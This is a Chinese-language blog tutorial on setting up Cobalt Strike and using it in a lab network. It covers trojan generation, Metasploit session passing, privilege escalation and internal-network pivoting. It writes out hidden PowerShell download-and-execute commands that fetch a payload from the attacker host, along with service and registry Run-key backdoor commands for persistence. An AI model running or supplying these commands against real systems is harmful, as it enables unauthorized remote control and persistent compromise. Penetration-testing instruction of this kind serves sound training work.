其他分享
首页 > 其他分享> > 【工具】Cobalt Strile安装及简单使用

【工具】Cobalt Strile安装及简单使用

作者:互联网

简介

​ Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。

​ Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能!

安装

环境

服务端:kali(192.168.1.28)

客户端:Win10

服务端

将文件上传到kali中
在这里插入图片描述

进入cs4.0中文目录输入命令

./teamserver [kali-ip] [密码]

在这里插入图片描述

客户端

进入文件夹双击客户端启动脚本
在这里插入图片描述

**主机:**为我们刚刚建立服务器的IP地址
**端口:**端口不用管 默认就可以
**用户名:**随意都行 (默认就可以)
**密码:**输入刚才服务端密码

在这里插入图片描述

检查指纹
在这里插入图片描述

成功连接 在这里插入图片描述

软件说明

每个按钮的意思 在这里插入图片描述

演示实例

环境

攻击机:kali(192.168.1.28)

边缘主机:Win7(192.168.1.8、10.10.10.2)

内网主机:Winxp(10.10.10.3)

实例

创建监听 在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

创建木马
在这里插入图片描述

选择监听器
在这里插入图片描述

选择木马保存路径
在这里插入图片描述
在这里插入图片描述

开启web服务
在这里插入图片描述

选择刚刚生成的木马文件
在这里插入图片描述
在这里插入图片描述

在靶机运行木马
在这里插入图片描述

靶机成功上线
在这里插入图片描述

在这里插入图片描述

联动MSF(shell)

MSF开启监听

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.183.147
set lport 4444
run

在这里插入图片描述

创建两个监听器,一个使用windows/beacon_http/reverse_http来监听肉鸡,另一个使用windows/foreign/reverse_http来将获取到的控制权传给msf(注意:这里的端口要与msf监听的端口一致)

在这里插入图片描述
在这里插入图片描述

当目标上线后,选择目标点击鼠标右键选择增加会话
在这里插入图片描述

在这里插入图片描述

获取到的会话不稳定
在这里插入图片描述

提权

选中目标点击鼠标右键选择执行->提权
在这里插入图片描述

选择监听器
在这里插入图片描述

提权成功
在这里插入图片描述

权限维持

点击攻击->钓鱼攻击->script web delivery
在这里插入图片描述

选择监听器
在这里插入图片描述

点击开始生成如下命令

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.28:80/a'))"

在靶机上执行上面生成的命令会上线具有普通用户权限的主机
在这里插入图片描述

提权之后打开beacon shell并执行命令

shell sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.183.28:80/a'))\""

在这里插入图片描述

在靶机上查看服务
在这里插入图片描述

将服务改为自动

shell sc config "name" start= auto

在这里插入图片描述
在这里插入图片描述

当靶机重启后依旧可以拿到权限

注册表后门

点击攻击->生成后门->windows executable

在这里插入图片描述

设置监听
在这里插入图片描述

保存到桌面
在这里插入图片描述

上传木马文件,选择会话点击鼠标右键选择目标->文件管理
在这里插入图片描述

选择木马文件进行上传
在这里插入图片描述

设置为注册表后门

shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "keyname" /t REG_SZ /d "C:\Users\aa\Desktop\artifact.exe" /f

在这里插入图片描述
在这里插入图片描述

也可以选择将exe设置为服务后门

shell sc create "exe" binpath= "C:\Users\abc\Desktop\artifact.exe"

在这里插入图片描述
在这里插入图片描述

设置Socks代理

开启socks4a代理,通过代理进行内网渗透
开启socks,可以通过命令,也可以通过右键选择中转->SOCKS Server
在这里插入图片描述

socks 12345

在这里插入图片描述

编辑proxychains.conf ,在文件末尾添加socks4代理服务器

vi /etc/proxychains.conf

在这里插入图片描述

使用proxychains代理扫描内网主机,socks4的代理,只能使用tcp协议,所以nmap使用的时候要使用-sT选择使用tcp协议,要使用-Pn不使用ICMP的ping确认主机存活

proxychains nmap -sT -Pn 10.10.10.0/24

在这里插入图片描述

可以判断出是存在主机10.10.10.3的,对内网主机10.10.10.3进行端口扫描

proxychains nmap -sT -Pn 10.10.10.3

在这里插入图片描述

联动MSF(扫描)

点击视图->代理信息->选择Socks4a Proxy,点击Tunnel
在这里插入图片描述

在这里插入图片描述

启动MSF输入方框中的内容

setg Proxies socks4:192.168.1.28:12345

在这里插入图片描述

扫描
在这里插入图片描述

标签:exe,Strile,端口,192.168,Cobalt,选择,木马,10.10,安装
来源: https://blog.csdn.net/qq_44276741/article/details/122249607